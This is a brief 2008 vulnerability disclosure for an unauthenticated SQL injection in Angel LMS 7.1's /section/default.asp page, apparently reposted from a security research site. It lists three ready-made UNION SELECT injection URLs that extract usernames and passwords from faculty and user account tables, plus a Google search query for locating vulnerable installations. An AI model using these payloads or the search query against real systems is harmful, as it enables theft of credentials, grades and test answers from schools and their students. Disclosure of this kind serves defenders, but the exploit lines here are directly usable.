Angel LMS 7.1 SQL Injection Vulnerability

craig — Mon, 03 Nov 2008 21:29:22 +0000

Angel LMS 7.1 contains a SQL injection vulnerability in the /section/default.asp page that grants an un-authenticated users access to all database tables and data. Examples include enumeration of tables, columns, user names, passwords, grades, and test questions/answers (you basically have access to everything).

Exploit POC
/section/default.asp?id=’+union+select+top+1+username+from+faculty_accounts–”
/section/default.asp?id=’+union+select+top+1+username+from+accounts–”
/section/default.asp?id=’+union+select+top+1+password+from+accounts–”

Google Dork
intext:”2006 angel learning, inc” -pdf

Credits
Vulnerability discovered by Craig Heffner, originally posted on milw0rm.

SourceSec Security Research » Web exploit

Angel LMS 7.1 SQL Injection Vulnerability